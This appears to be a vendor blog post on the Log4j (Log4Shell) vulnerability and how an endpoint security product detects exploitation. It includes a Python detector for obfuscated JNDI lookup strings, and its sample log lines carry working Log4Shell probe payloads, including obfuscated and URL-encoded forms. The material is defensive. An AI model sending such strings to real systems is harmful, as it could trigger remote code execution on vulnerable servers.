The Apache Log4j vulnerability (CVE-2021-44228) is on the mind of nearly every cybersecurity and IT team right now because of its widespread usage, ease of exploitation, and broad attack surface. This blog provides an overview of how Cisco Secure Endpoint helps protect your environment from attackers exploiting this vulnerability.
What You Need to Know About Log4j
On Thursday, December 9, the Apache Software Foundation disclosed a security vulnerability in Apache Log4j, a Java-based logging library widely used by developers around the world. This library is also embedded in many commercial and open-source products, including Apache Struts 2, Apache Solr, Apache Flink, Apache Druid, Apache Kafka, Elasticsearch, and more.
This vulnerability allows unauthenticated attackers to execute arbitrary code remotely on affected servers, simply by getting a crafted string into data the application logs, enabling them to gain full control of those servers. Because it is trivial to exploit and the affected library is so widely deployed, the vulnerability has received the maximum CVSS severity score of 10.0 and a 93/100 score from Kenna Security, Cisco’s risk-based vulnerability management solution.
How Cisco Secure Endpoint Helps
Cisco Secure Endpoint rapidly identifies and protects against Log4j exploits in multiple ways. It blocks threats that try to exploit the Log4j vulnerability with multifaceted prevention techniques, including machine learning and behavioral protection. Furthermore, robust detection and response capabilities reduce dwell time. Finally, rich threat intelligence from the Cisco Talos security research team allows you to have the latest protection from attackers.
In case any threats get through, advanced Endpoint Detection and Response (EDR) functionality such as SecureX Threat Hunting and Orbital Advanced Search quickly uncovers signs of Log4j exploitation attempts and post-exploitation activity such as lateral movement and suspicious command execution. This includes two new Orbital queries that identify entities affected by the Log4j vulnerability on Windows and Linux devices (windows_log4j_monitoring and linux_log4j_monitoring). To learn how to use these queries to detect Log4j attacks, please see the below video.
In addition, with extended detection and response (XDR) capabilities from the built-in Cisco SecureX platform, you get a more complete view of Log4j-related activity across your environment. This enables you to automate response actions to isolate and quarantine compromised endpoints, reducing the time it takes to detect and remediate a threat that leverages the Log4j vulnerability. Finally, cloud Indicators of Compromise (IOCs) in Secure Endpoint have been updated to include new Log4j-related detections, and new ClamAV signatures are available to block attacks exploiting Log4j.
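The exploitation attempts referred to above show up first as Log4j lookup strings in whatever the application logs (User-Agent headers, query strings, form fields). The following is an added example, not Cisco's code and not one of the Orbital queries named above: a small Python detector that normalises the documented Log4j lookup obfuscations (the lower/upper lookups and the ':-' default-value syntax that attackers used to hide the literal text "jndi") and URL-decodes the line before matching, so that probes such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} are caught alongside the plain ${jndi:...} form. The access-log lines are constructed for illustration, as are the IP addresses in them.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in log lines, including
common obfuscations, by normalising Log4j lookup syntax before matching.

Added example, not Cisco's or Apache's code. SAMPLE_LOG below is constructed
for illustration. The obfuscations handled are the documented Log4j lookup
features: ${lower:x}, ${upper:x}, and the ${key:-default} default-value form.
"""
import re
from urllib.parse import unquote

# Innermost ${...} expression: one whose braces contain no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# Final match, after normalisation. Log4j lower-cases the lookup prefix, so
# ${JNDI:...} works for the attacker as well; match case-insensitively.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j would, where that is
    possible offline; otherwise leave it untouched."""
    expr = m.group(1)
    prefix, _, arg = expr.partition(":")
    p = prefix.strip().lower()
    if p == "jndi":
        return m.group(0)                 # the lookup we want to detect; keep it
    if ":-" in expr:
        return expr.split(":-", 1)[1]     # ${anything:-default} -> default
    if p == "lower":
        return arg.lower()
    if p == "upper":
        return arg.upper()
    return m.group(0)                     # env/sys/date/...: cannot evaluate here


def normalize(text: str) -> str:
    """Repeatedly resolve innermost lookups until nothing changes.
    Each pass either removes a '${' or leaves the text unchanged, so it ends."""
    while True:
        new = _INNER.sub(_resolve, text)
        if new == text:
            return new
        text = new


def is_log4shell_probe(line: str) -> bool:
    """True if the line, raw or URL-decoded, contains a JNDI lookup after
    de-obfuscation."""
    return any(_JNDI.search(normalize(c)) for c in (line, unquote(line)))


def scan(lines):
    """Return the subset of lines that look like Log4Shell probes."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed web-server access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/a}"',
    '10.0.0.5 - - [10/Dec/2021:14:02:14 +0000] '
    '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" '
    '400 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" '
    '200 "-" "Mozilla/5.0"',
    # A ${...} that is not a JNDI lookup must not be flagged.
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /?q=${env:HOME} HTTP/1.1" '
    '200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("PROBE:", hit)
```

Run against the sample, the first four lines are reported and the last two are not. Normalising before matching matters: a regex on the literal text "jndi" alone misses the second and third lines, which is exactly the gap the obfuscated payloads seen in the wild were built to exploit. Treat a hit as an attempt, not a confirmed compromise; confirmation needs the host-side evidence (outbound LDAP/RMI connections, class loading, child processes of the Java service) that the EDR queries above are meant to surface.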
For more information on the Cisco response to Log4j, including how other Cisco Secure solutions can protect you from this vulnerability, please see the Cisco Talos Threat Advisory page and the Cisco Event Response page for Log4j. To learn more about Secure Endpoint, please visit our product page.
What settings in AMP / Secure Endpoint must be configured to protect from log4j?
If following Cisco policy recommendations, will this protect servers from log4j exploits?
Cisco Recommended Settings for Servers:
Malicious Activity Protection: Disabled
System Process Protection: Disabled
Script Protection: Quarantine
Exploit Prevention: Audit
Exploit Prevention – Script Control: Audit
Behavioral Protection: Protect